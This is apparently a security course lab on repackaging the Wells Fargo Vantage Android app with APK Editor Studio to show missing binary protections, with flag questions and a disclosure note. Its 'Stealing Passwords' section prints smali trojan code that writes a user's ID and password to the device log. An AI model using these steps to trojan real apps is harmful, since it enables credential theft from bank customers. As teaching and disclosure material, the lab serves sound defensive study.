M 116: Modifying Apps with APK Editor Studio (30 pts)

What You Need for This Project

An Android emulator

Purpose

APK Editor Studio makes it easy to modify Android apps, if they lack binary protections.

M7: Insufficient Binary Protections is one of the OWASP Top Ten Mobile Risks.

Installing the Wells Fargo Vantage App

Install the app from Google Play in your emulator, as shown below.

Archived App
In case they ever fix the app, here's the old version from 9-27-25:
base.apk

Launch the app. Observe the first splash screen, as shown below.

Close the app.

Installing Apk Analyzer

Install the app from Google Play in your emulator, as shown below.

Launch Apk Analyzer.

Scroll down to "Vantage" anc tap it.

Notice the Package Name, as shown below.

Pulling the App

On your host system, execute these commands to pull the app off your emulator.

(If you prefer, you can simply download the base.apk file from the link in the box above instead.)

The first command gives you a path, which may be different from the path shown below. Use the correct path for your system in the second command.

adb shell pm path com.wellsFargo.ceomobile adb pull /data/app/~~GuTe9OLMVTS3xr7S-o32uw==/com.wellsFargo.ceomobile-pCJDMB5MYMv9WIzABCKfBg==/base.apk

The app is about 91 MB in size, as shown below.

Installing Java

In a Terminal, execute this command:

java

If java is not found, download and install the JDK from this link: Java Downloads.

Installing APK Editor Studio

Go to https://qwertycube.com/apk-editor-studio/download/

Install the app on your system.

Launch the app. If you are using a Mac, the app will refuse to start. You need to go here to allow it:

At the top left, click the Apple. Then click "System Settings", "Privacy & Security", Security, and "Open Anyway", as shown below.

Enabling Smali Decompilation

In APK Editor Studio, if you're on a PC, click Settings, Options.

On a Mac, it's "APK Editor", Preferences.

Click the Apktool tab.

Under Unpacking, ensure "Decompile source code (smali)" is checked, as shown below.

Then click OK.

Decompiling the Vantage App

In APK Editor Studio, click File, "Opan APK".

Navigate to the Vantage app's base.apk file and open it.

Finding the Splash Screen Message

In APK Editor Studio, click Tools, "Search in Project".

Search for "requires access to the camera".

It's only found in one place, as shown below.

Editing the Smali File

In APK Editor Studio, in the center pane, click the "Project Manager" tab.

Click the "Open Contents" button.

Navigate to this file:

smali_classes3/com/wellsFargo/vantage/SplashActivity$f$a.smali

Open the file in a text editor, such as Notepad++ on a PC, or TextEdit on a Mac, or nano.

Search for "requires access"

Add a message containing the word TROJAN to message, as shown below.

Then save the file.

In APK Editor Studio, in the center pane, click "Save APK"

Save the file with the name base_mod.apk

A box pops up warning that you are using the "keystore provided for demonstration purposes".

Click OK.

It will take several seconds to rebuild the APK. You will see status messages in the top left pane of APK Editor Studio.

Installing the Modified File

Drag the base_mod.apk file and drop it on your emulator.

M 116.1: Error Message (15 pts)
Find the text covered by a green box in the image below. That's the flag.

Uninstalling the Original App

On your emulator, open Settings. Tap Apps. Tap Vantage. Tap Uninstall. Tap OK.

Installing the Modified File

Drag the base_mod.apk file and drop it on your emulator.

Launch the app. You see the trojaned message, as shown below.

Stealing Passwords (15 pts extra)

On your emulated phone, in the Vantage app, click "Continue". Approve all the app's permissions. You see a login page, as shown below.

Notice the label "User ID".

Searching for "User ID"

In APK Editor Studio, from the menu bar, click Tools, "Search in Project".

Search for "User ID".

There are 8 results, as shown below.

Notice the third hit, with a path ending in "k.1.smali", highlighted in the image above.

In APK Editor Studio, in the center pane, click the "Project Manager" tab and click "Open Contents".

Navigate to the "k.1.smali" file, as shown below.

Edit the file, inserting Trojan code, as shown below.

.locals 3 # CHANGED TO 3 # TROJAN new-instance v1, Ljava/lang/StringBuilder; invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V invoke-virtual {v1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; const-string v0, ":" invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String; move-result-object v1 const-string v0, "TROJAN Stealing Credentials:" invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I # END OF TROJAN

M 116.2: Label (15 pts)
Find the text covered by a green box in the image above. That's the flag.

In APK Editor Studio, save the modified app.

On your phone, uninstall the Vantage app.

Install the modified version.

Monitoring the Log

Start monitoring the log with ADB, as shown in the second image below.

Then log in, as shown below.

The stolen password appears in the log, as shown below.

Responsible Disclosure

I notified the company on 9-27-25.

Posted privately 9-27-25 by Sam Bowne
Updated with "init" 10-16-25